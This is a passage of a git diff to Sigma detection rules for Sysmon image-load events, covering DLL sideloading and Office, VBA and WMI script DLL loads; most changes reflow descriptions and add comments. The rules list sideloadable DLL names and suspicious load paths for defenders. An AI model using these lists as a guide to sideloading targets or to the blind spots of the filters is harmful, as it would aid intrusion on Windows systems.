https://www.mandiant.com/resources/blog/lnk-between-browsers - https://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/ @@ -25,6 +24,7 @@ detection: selection: Image|endswith: \excel.exe ImageLoaded|contains: + # Note: Add or remove locations from this list based on your internal policy - \Desktop\ - \Downloads\ - \Perflogs\ @@ -34,7 +34,6 @@ detection: ImageLoaded|endswith: .xll condition: image_load and selection falsepositives: - - Some tuning might be required to allow or remove certain locations used by the - rule if you consider them as safe locations + - Some tuning might be required to allow or remove certain locations used by the rule if you consider them as safe locations level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_office_kerberos_dll_load.yml b/sigma/sysmon/image_load/image_load_office_kerberos_dll_load.yml index 7a947fa84..ad99ea80d 100644 --- a/sigma/sysmon/image_load/image_load_office_kerberos_dll_load.yml +++ b/sigma/sysmon/image_load/image_load_office_kerberos_dll_load.yml @@ -23,7 +23,7 @@ detection: - \excel.exe - \mspub.exe - \onenote.exe - - \onenoteim.exe + - \onenoteim.exe # Just in case - \outlook.exe - \powerpnt.exe - \winword.exe diff --git a/sigma/sysmon/image_load/image_load_office_outlook_outlvba_load.yml b/sigma/sysmon/image_load/image_load_office_outlook_outlvba_load.yml index c2406620e..a21f93f6b 100644 --- a/sigma/sysmon/image_load/image_load_office_outlook_outlvba_load.yml +++ b/sigma/sysmon/image_load/image_load_office_outlook_outlvba_load.yml @@ -1,8 +1,7 @@ title: Microsoft VBA For Outlook Addin Loaded Via Outlook id: 9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed status: test -description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by - the outlook process +description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=58 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_office_powershell_dll_load.yml b/sigma/sysmon/image_load/image_load_office_powershell_dll_load.yml index 533827602..fca35aad3 100644 --- a/sigma/sysmon/image_load/image_load_office_powershell_dll_load.yml +++ b/sigma/sysmon/image_load/image_load_office_powershell_dll_load.yml @@ -22,7 +22,7 @@ detection: - \mspub.exe - \outlook.exe - \onenote.exe - - \onenoteim.exe + - \onenoteim.exe # Just in case - \powerpnt.exe - \winword.exe ImageLoaded|contains: diff --git a/sigma/sysmon/image_load/image_load_office_vbadll_load.yml b/sigma/sysmon/image_load/image_load_office_vbadll_load.yml index ab3953449..184c90bc0 100644 --- a/sigma/sysmon/image_load/image_load_office_vbadll_load.yml +++ b/sigma/sysmon/image_load/image_load_office_vbadll_load.yml @@ -1,8 +1,7 @@ title: VBA DLL Loaded Via Office Application id: e6ce8457-68b1-485b-9bdd-3c2b5d679aa9 status: test -description: Detects VB DLL's loaded by an office application. Which could indicate - the presence of VBA Macros. +description: Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros. references: - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 author: Antonlovesdnb @@ -24,7 +23,7 @@ detection: - \excel.exe - \mspub.exe - \onenote.exe - - \onenoteim.exe + - \onenoteim.exe # Just in case - \outlook.exe - \powerpnt.exe - \winword.exe diff --git a/sigma/sysmon/image_load/image_load_scrcons_wmi_scripteventconsumer.yml b/sigma/sysmon/image_load/image_load_scrcons_wmi_scripteventconsumer.yml index 37ebadd84..2438c38c0 100644 --- a/sigma/sysmon/image_load/image_load_scrcons_wmi_scripteventconsumer.yml +++ b/sigma/sysmon/image_load/image_load_scrcons_wmi_scripteventconsumer.yml @@ -1,8 +1,7 @@ title: WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load id: b439f47d-ef52-4b29-9a2f-57d8a96cb6b8 status: test -description: Detects signs of the WMI script host process "scrcons.exe" loading scripting - DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity. +description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity. references: - https://twitter.com/HunterPlaybook/status/1301207718355759107 - https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/ @@ -33,8 +32,6 @@ detection: condition: image_load and selection falsepositives: - Legitimate event consumers - - Dell computers on some versions register an event consumer that is known to - cause false positives when brightness is changed by the corresponding keyboard - button + - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_7za.yml b/sigma/sysmon/image_load/image_load_side_load_7za.yml index 037bbe36e..769c2af08 100644 --- a/sigma/sysmon/image_load/image_load_side_load_7za.yml +++ b/sigma/sysmon/image_load/image_load_side_load_7za.yml @@ -31,8 +31,6 @@ detection: - C:\Program Files\ condition: image_load and (selection and not 1 of filter_main_*) falsepositives: - - Legitimate third party application located in "AppData" may leverage this DLL - to offer 7z compression functionality and may generate false positives. Apply - additional filters as needed. + - Legitimate third party application located in "AppData" may leverage this DLL to offer 7z compression functionality and may generate false positives. Apply additional filters as needed. level: low ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_abused_dlls_susp_paths.yml b/sigma/sysmon/image_load/image_load_side_load_abused_dlls_susp_paths.yml index 6f3ba5cd9..86129421e 100644 --- a/sigma/sysmon/image_load/image_load_side_load_abused_dlls_susp_paths.yml +++ b/sigma/sysmon/image_load/image_load_side_load_abused_dlls_susp_paths.yml @@ -1,8 +1,7 @@ title: Abusable DLL Potential Sideloading From Suspicious Location id: 799a5f48-0ac1-4e0f-9152-71d137d48c2a status: experimental -description: Detects potential DLL sideloading of DLLs that are known to be abused - from suspicious locations +description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations references: - https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html - https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/ @@ -21,6 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_dll: ImageLoaded|endswith: + # Note: Add more generic DLLs that cannot be pin-pointed to a single application - \coreclr.dll - \facesdk.dll - \HPCustPartUI.dll @@ -33,18 +33,18 @@ detection: - \Temporary Internet - \Windows\Temp\ selection_folders_2: - - ImageLoaded|contains|all: - - :\Users\ - - \Favorites\ - - ImageLoaded|contains|all: - - :\Users\ - - \Favourites\ - - ImageLoaded|contains|all: - - :\Users\ - - \Contacts\ - - ImageLoaded|contains|all: - - :\Users\ - - \Pictures\ + - ImageLoaded|contains|all: + - :\Users\ + - \Favorites\ + - ImageLoaded|contains|all: + - :\Users\ + - \Favourites\ + - ImageLoaded|contains|all: + - :\Users\ + - \Contacts\ + - ImageLoaded|contains|all: + - :\Users\ + - \Pictures\ condition: image_load and (selection_dll and 1 of selection_folders_*) falsepositives: - Unknown diff --git a/sigma/sysmon/image_load/image_load_side_load_antivirus.yml b/sigma/sysmon/image_load/image_load_side_load_antivirus.yml index 2f25552ee..e4ab80afd 100644 --- a/sigma/sysmon/image_load/image_load_side_load_antivirus.yml +++ b/sigma/sysmon/image_load/image_load_side_load_antivirus.yml @@ -1,10 +1,9 @@ title: Potential Antivirus Software DLL Sideloading id: 552b6b65-df37-4d3e-a258-f2fc4771ae54 status: experimental -description: Detects potential DLL sideloading of DLLs that are part of antivirus - software suchas McAfee, Symantec...etc +description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc references: - - https://hijacklibs.net/ + - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) date: 2022/08/17 modified: 2023/03/13 @@ -19,6 +18,7 @@ logsource: category: image_load product: windows detection: + # Bitdefender image_load: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational @@ -35,12 +35,14 @@ detection: - C:\Program Files\Dell\SARemediation\audit\log.dll filter_log_dll_canon: ImageLoaded|startswith: C:\Program Files\Canon\MyPrinter\ + # F-Secure selection_fsecure: ImageLoaded|endswith: \qrt.dll filter_fsecure: ImageLoaded|startswith: - C:\Program Files\F-Secure\Anti-Virus\ - C:\Program Files (x86)\F-Secure\Anti-Virus\ + # McAfee selection_mcafee: ImageLoaded|endswith: - \ashldres.dll @@ -50,41 +52,38 @@ detection: ImageLoaded|startswith: - C:\Program Files\McAfee\ - C:\Program Files (x86)\McAfee\ + # CyberArk selection_cyberark: ImageLoaded|endswith: \vftrace.dll filter_cyberark: ImageLoaded|startswith: - C:\Program Files\CyberArk\Endpoint Privilege Manager\Agent\x32\ - C:\Program Files (x86)\CyberArk\Endpoint Privilege Manager\Agent\x32\ + # Avast selection_avast: ImageLoaded|endswith: \wsc.dll filter_avast: ImageLoaded|startswith: - C:\program Files\AVAST Software\Avast\ - C:\program Files (x86)\AVAST Software\Avast\ + # ESET selection_eset_deslock: ImageLoaded|endswith: \DLPPREM32.dll filter_eset_deslock: ImageLoaded|startswith: - C:\program Files\ESET - C:\program Files (x86)\ESET + # Trend Micro Titanium selection_titanium: ImageLoaded|endswith: \tmdbglog.dll filter_titanium: ImageLoaded|startswith: - C:\program Files\Trend Micro\Titanium\ - C:\program Files (x86)\Trend Micro\Titanium\ - condition: image_load and ((selection_bitdefender and not 1 of filter_log_dll_*) - or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not - filter_mcafee) or (selection_cyberark and not filter_cyberark) or (selection_avast - and not filter_avast) or (selection_titanium and not filter_titanium) or (selection_eset_deslock - and not filter_eset_deslock)) + condition: image_load and ((selection_bitdefender and not 1 of filter_log_dll_*) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee) or (selection_cyberark and not filter_cyberark) or (selection_avast and not filter_avast) or (selection_titanium and not filter_titanium) or (selection_eset_deslock and not filter_eset_deslock)) falsepositives: - - Applications that load the same dlls mentioned in the detection section. Investigate - them and filter them out if a lot FPs are caused. - - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) - is known to contain the 'log.dll' file. - - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain - the 'log.dll' file + - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused. + - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file. + - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml b/sigma/sysmon/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml index 2b8f1e61d..4157f0d18 100644 --- a/sigma/sysmon/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml +++ b/sigma/sysmon/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml @@ -1,8 +1,7 @@ title: Aruba Network Service Potential DLL Sideloading id: 90ae0469-0cee-4509-b67f-e5efcef040f7 status: experimental -description: Detects potential DLL sideloading activity via the Aruba Networks Virtual - Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking +description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking references: - https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_ccleaner_du.yml b/sigma/sysmon/image_load/image_load_side_load_ccleaner_du.yml index bf8a826b0..55aeaa241 100644 --- a/sigma/sysmon/image_load/image_load_side_load_ccleaner_du.yml +++ b/sigma/sysmon/image_load/image_load_side_load_ccleaner_du.yml @@ -31,7 +31,6 @@ detection: - \CCleaner64.exe condition: image_load and (selection and not 1 of filter_main_*) falsepositives: - - False positives could occur from other custom installation paths. Apply additional - filters accordingly. + - False positives could occur from other custom installation paths. Apply additional filters accordingly. level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_ccleaner_reactivator.yml b/sigma/sysmon/image_load/image_load_side_load_ccleaner_reactivator.yml index 1c4e7e2c4..e6167e543 100644 --- a/sigma/sysmon/image_load/image_load_side_load_ccleaner_reactivator.yml +++ b/sigma/sysmon/image_load/image_load_side_load_ccleaner_reactivator.yml @@ -29,7 +29,6 @@ detection: Image|endswith: \CCleanerReactivator.exe condition: image_load and (selection and not 1 of filter_main_*) falsepositives: - - False positives could occur from other custom installation paths. Apply additional - filters accordingly. + - False positives could occur from other custom installation paths. Apply additional filters accordingly. level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_classicexplorer32.yml b/sigma/sysmon/image_load/image_load_side_load_classicexplorer32.yml index 67872f025..efc6c5589 100644 --- a/sigma/sysmon/image_load/image_load_side_load_classicexplorer32.yml +++ b/sigma/sysmon/image_load/image_load_side_load_classicexplorer32.yml @@ -1,8 +1,7 @@ title: Potential DLL Sideloading Via ClassicExplorer32.dll id: caa02837-f659-466f-bca6-48bde2826ab4 status: test -description: Detects potential DLL sideloading using ClassicExplorer32.dll from the - Classic Shell software +description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software references: - https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets - https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/ diff --git a/sigma/sysmon/image_load/image_load_side_load_comctl32.yml b/sigma/sysmon/image_load/image_load_side_load_comctl32.yml index 4304865a8..d064a4ba3 100644 --- a/sigma/sysmon/image_load/image_load_side_load_comctl32.yml +++ b/sigma/sysmon/image_load/image_load_side_load_comctl32.yml @@ -1,8 +1,7 @@ title: Potential DLL Sideloading Via comctl32.dll id: 6360757a-d460-456c-8b13-74cf0e60cceb status: test -description: Detects potential DLL sideloading using comctl32.dll to obtain system - privileges +description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges references: - https://github.com/binderlabs/DirCreate2System - https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt diff --git a/sigma/sysmon/image_load/image_load_side_load_coregen.yml b/sigma/sysmon/image_load/image_load_side_load_coregen.yml index f673ffe48..65c0173de 100644 --- a/sigma/sysmon/image_load/image_load_side_load_coregen.yml +++ b/sigma/sysmon/image_load/image_load_side_load_coregen.yml @@ -1,8 +1,7 @@ title: Potential DLL Sideloading Using Coregen.exe id: 0fa66f66-e3f6-4a9c-93f8-4f2610b00171 status: test -description: Detect usage of DLL "coregen.exe" (Microsoft CoreCLR Native Image Generator) - binary to sideload arbitrary DLLs. +description: Detect usage of DLL "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs. references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/ author: frack113 diff --git a/sigma/sysmon/image_load/image_load_side_load_cpl_from_non_system_location.yml b/sigma/sysmon/image_load/image_load_side_load_cpl_from_non_system_location.yml index 6861e95c8..501c69659 100644 --- a/sigma/sysmon/image_load/image_load_side_load_cpl_from_non_system_location.yml +++ b/sigma/sysmon/image_load/image_load_side_load_cpl_from_non_system_location.yml @@ -1,8 +1,7 @@ title: System Control Panel Item Loaded From Uncommon Location id: 2b140a5c-dc02-4bb8-b6b1-8bdb45714cde status: experimental -description: Detects image load events of system control panel items (.cpl) from uncommon - or non-system locations which might be the result of sideloading. +description: Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading. references: - https://www.hexacorn.com/blog/2024/01/06/1-little-known-secret-of-fondue-exe/ - https://www.hexacorn.com/blog/2024/01/01/1-little-known-secret-of-hdwwiz-exe/ @@ -21,8 +20,8 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: ImageLoaded|endswith: - - \hdwwiz.cpl - - \appwiz.cpl + - \hdwwiz.cpl # Usually loaded by hdwwiz.exe + - \appwiz.cpl # Usually loaded by fondue.exe filter_main_legit_location: ImageLoaded|contains: - :\Windows\System32\ diff --git a/sigma/sysmon/image_load/image_load_side_load_dbgcore_dll.yml b/sigma/sysmon/image_load/image_load_side_load_dbgcore_dll.yml index 60b20f7e7..5bb8dcbd8 100644 --- a/sigma/sysmon/image_load/image_load_side_load_dbgcore_dll.yml +++ b/sigma/sysmon/image_load/image_load_side_load_dbgcore_dll.yml @@ -3,7 +3,7 @@ id: 9ca2bf31-0570-44d8-a543-534c47c33ed7 status: experimental description: Detects DLL sideloading of "dbgcore.dll" references: - - https://hijacklibs.net/ + - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) date: 2022/10/25 modified: 2023/05/05 @@ -36,7 +36,6 @@ detection: ImageLoaded|endswith: \Steam\bin\cef\cef.win7x64\dbgcore.dll condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Legitimate applications loading their own versions of the DLL mentioned in this - rule + - Legitimate applications loading their own versions of the DLL mentioned in this rule level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_dbghelp_dll.yml b/sigma/sysmon/image_load/image_load_side_load_dbghelp_dll.yml index b2b48ef70..01e5b96df 100644 --- a/sigma/sysmon/image_load/image_load_side_load_dbghelp_dll.yml +++ b/sigma/sysmon/image_load/image_load_side_load_dbghelp_dll.yml @@ -3,7 +3,7 @@ id: 6414b5cd-b19d-447e-bb5e-9f03940b5784 status: experimental description: Detects DLL sideloading of "dbghelp.dll" references: - - https://hijacklibs.net/ + - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) date: 2022/10/25 modified: 2023/05/05 @@ -42,7 +42,6 @@ detection: - \Epic Games\MagicLegends\x86\dbghelp.dll condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Legitimate applications loading their own versions of the DLL mentioned in this - rule + - Legitimate applications loading their own versions of the DLL mentioned in this rule level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_from_non_system_location.yml b/sigma/sysmon/image_load/image_load_side_load_from_non_system_location.yml index 501661089..de3b4925f 100644 --- a/sigma/sysmon/image_load/image_load_side_load_from_non_system_location.yml +++ b/sigma/sysmon/image_load/image_load_side_load_from_non_system_location.yml @@ -1,13 +1,12 @@ title: Potential System DLL Sideloading From Non System Locations id: 4fc0deee-0057-4998-ab31-d24e46e0aba4 status: experimental -description: Detects DLL sideloading of DLLs usually located in system locations (System32, - SysWOW64, etc.). +description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.). references: - - https://hijacklibs.net/ - - https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/ - - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ - - https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md + - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there). Wietze Beukema (project and research) + - https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/ # WindowsCodecs.dll + - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ # iphlpapi.dll + - https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md # XForceIR (SideLoadHunter Project), Chris Spehn (research WFH Dridex) - https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/ author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/14 @@ -418,6 +417,7 @@ detection: - \winsync.dll - \wscapi.dll - \wsmsvc.dll + # From https://github.com/XForceIR/SideLoadHunter/blob/main/SideLoads/README.md - \FxsCompose.dll - \WfsR.dll - \rpchttp.dll @@ -434,10 +434,12 @@ detection: - \FXSRESM.DLL - \cryptnet.dll - \COMRES.DLL + # The DLLs below exists in "C:\Windows\System32\DriverStore\FileRepository\" folder. But there is also a copy located in "C:\ProgramData\Package Cache\XXXXXXX\Graphics\". If you see them being loaded from there. Please comment them out, don't add a filter for ProgramData :) - \igdumdim64.dll - \igd10iumd64.dll - \igd12umd64.dll - \igdusc64.dll + # Other - \WLBSCTRL.dll - \TSMSISrv.dll - \TSVIPSrv.dll @@ -445,6 +447,7 @@ detection: - \WptsExtensions.dll - \wbemcomn.dll filter_main_generic: + # Note: this filter is generic on purpose to avoid insane amount of FP from legitimate third party applications. A better approach would be to baseline everything and add specific filters to avoid blind spots ImageLoaded|contains: - :\Windows\System32\ - :\Windows\SysWOW64\ @@ -479,7 +482,6 @@ detection: ImageLoaded|endswith: \PolicyManager.dll condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Legitimate applications loading their own versions of the DLLs mentioned in - this rule + - Legitimate applications loading their own versions of the DLLs mentioned in this rule level: high ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_goopdate.yml b/sigma/sysmon/image_load/image_load_side_load_goopdate.yml index 776ca06fe..177c0b618 100644 --- a/sigma/sysmon/image_load/image_load_side_load_goopdate.yml +++ b/sigma/sysmon/image_load/image_load_side_load_goopdate.yml @@ -24,6 +24,7 @@ detection: ImageLoaded|endswith: \goopdate.dll filter_main_generic: ImageLoaded|startswith: + # Many third party chromium based apps use this DLLs. It's better to create a baseline and add specific filters - C:\Program Files (x86)\ - C:\Program Files\ filter_optional_dropbox_installer_temp: @@ -35,8 +36,7 @@ detection: - .tmp\\goopdate.dll condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - False positives are expected from Google Chrome installations running from user - locations (AppData) and other custom locations. Apply additional filters accordingly. + - False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly. - Other third party chromium browsers located in AppData level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_gup_libcurl.yml b/sigma/sysmon/image_load/image_load_side_load_gup_libcurl.yml index 7d316bc72..7d7f965ac 100644 --- a/sigma/sysmon/image_load/image_load_side_load_gup_libcurl.yml +++ b/sigma/sysmon/image_load/image_load_side_load_gup_libcurl.yml @@ -1,8 +1,7 @@ title: Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE id: e49b5745-1064-4ac1-9a2e-f687bc2dd37e status: experimental -description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process - from an uncommon location +description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_iviewers.yml b/sigma/sysmon/image_load/image_load_side_load_iviewers.yml index da39ca9ff..730c213a5 100644 --- a/sigma/sysmon/image_load/image_load_side_load_iviewers.yml +++ b/sigma/sysmon/image_load/image_load_side_load_iviewers.yml @@ -1,8 +1,7 @@ title: Potential Iviewers.DLL Sideloading id: 4c21b805-4dd7-469f-b47d-7383a8fcb437 status: experimental -description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface - Viewer) +description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer) references: - https://www.secureworks.com/research/shadowpad-malware-analysis author: X__Junior (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_libvlc.yml b/sigma/sysmon/image_load/image_load_side_load_libvlc.yml index e8a5c9ee8..2cb9ebb80 100644 --- a/sigma/sysmon/image_load/image_load_side_load_libvlc.yml +++ b/sigma/sysmon/image_load/image_load_side_load_libvlc.yml @@ -1,8 +1,7 @@ title: Potential Libvlc.DLL Sideloading id: bf9808c4-d24f-44a2-8398-b65227d406b6 status: experimental -description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately - used by "VLC.exe" +description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe" references: - https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html - https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html diff --git a/sigma/sysmon/image_load/image_load_side_load_mfdetours.yml b/sigma/sysmon/image_load/image_load_side_load_mfdetours.yml index e6bffd71f..01d214f53 100644 --- a/sigma/sysmon/image_load/image_load_side_load_mfdetours.yml +++ b/sigma/sysmon/image_load/image_load_side_load_mfdetours.yml @@ -1,9 +1,7 @@ title: Potential Mfdetours.DLL Sideloading id: d2605a99-2218-4894-8fd3-2afb7946514d status: experimental -description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" - it can be abused to attach to an arbitrary process and force load any DLL named - "mfdetours.dll" from the current directory of execution. +description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_mfdetours_unsigned.yml b/sigma/sysmon/image_load/image_load_side_load_mfdetours_unsigned.yml index 5218d8454..fed8be5b7 100644 --- a/sigma/sysmon/image_load/image_load_side_load_mfdetours_unsigned.yml +++ b/sigma/sysmon/image_load/image_load_side_load_mfdetours_unsigned.yml @@ -1,12 +1,10 @@ title: Unsigned Mfdetours.DLL Sideloading id: 948a0953-f287-4806-bbcb-3b2e396df89f related: - - id: d2605a99-2218-4894-8fd3-2afb7946514d - type: similar + - id: d2605a99-2218-4894-8fd3-2afb7946514d + type: similar status: experimental -description: Detects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" - can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" - from the current directory of execution. +description: Detects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_non_existent_dlls.yml b/sigma/sysmon/image_load/image_load_side_load_non_existent_dlls.yml index ffac6a6ab..6c96d22e8 100644 --- a/sigma/sysmon/image_load/image_load_side_load_non_existent_dlls.yml +++ b/sigma/sysmon/image_load/image_load_side_load_non_existent_dlls.yml @@ -1,17 +1,14 @@ title: Potential DLL Sideloading Of Non-Existent DLLs From System Folders id: 6b98b92b-4f00-4f62-b4fe-4d1920215771 related: - - id: df6ecb8b-7822-4f4b-b412-08f524b4576c - type: similar - - id: 602a1f13-c640-4d73-b053-be9a2fa58b77 - type: obsoletes + - id: df6ecb8b-7822-4f4b-b412-08f524b4576c # FileEvent rule + type: similar + - id: 602a1f13-c640-4d73-b053-be9a2fa58b77 + type: obsoletes status: test -description: 'Detects DLL sideloading of system DLLs that are not present on the system - by default (at least not in system directories). - +description: | + Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation. - - ' references: - https://decoded.avast.io/martinchlumecky/png-steganography/ - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992 @@ -38,6 +35,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: ImageLoaded|endswith: + # Add other DLLs - :\Windows\System32\TSMSISrv.dll - :\Windows\System32\TSVIPSrv.dll - :\Windows\System32\wbem\wbemcomn.dll @@ -47,6 +45,7 @@ detection: filter_main_ms_signed: Signed: 'true' SignatureStatus: Valid + # There could be other signatures (please add when found) Signature: Microsoft Windows condition: image_load and (selection and not 1 of filter_main_*) falsepositives: diff --git a/sigma/sysmon/image_load/image_load_side_load_office_dlls.yml b/sigma/sysmon/image_load/image_load_side_load_office_dlls.yml index a73510545..b6ce7b7a8 100644 --- a/sigma/sysmon/image_load/image_load_side_load_office_dlls.yml +++ b/sigma/sysmon/image_load/image_load_side_load_office_dlls.yml @@ -1,10 +1,9 @@ title: Microsoft Office DLL Sideload id: 829a3bdf-34da-4051-9cf4-8ed221a8ae4f status: experimental -description: Detects DLL sideloading of DLLs that are part of Microsoft Office from - non standard location +description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location references: - - https://hijacklibs.net/ + - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) date: 2022/08/17 modified: 2023/03/15 diff --git a/sigma/sysmon/image_load/image_load_side_load_rjvplatform_default_location.yml b/sigma/sysmon/image_load/image_load_side_load_rjvplatform_default_location.yml index 58369c1e6..2460bc732 100644 --- a/sigma/sysmon/image_load/image_load_side_load_rjvplatform_default_location.yml +++ b/sigma/sysmon/image_load/image_load_side_load_rjvplatform_default_location.yml @@ -1,9 +1,7 @@ title: Potential RjvPlatform.DLL Sideloading From Default Location id: 259dda31-b7a3-444f-b7d8-17f96e8a7d0d status: experimental -description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" - binary which can be abused as a method of DLL side loading since the "$SysReset" - directory isn't created by default. +description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default. references: - https://twitter.com/0gtweet/status/1666716511988330499 author: X__Junior (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_rjvplatform_non_default_location.yml b/sigma/sysmon/image_load/image_load_side_load_rjvplatform_non_default_location.yml index 3c4ee735e..a32161b66 100644 --- 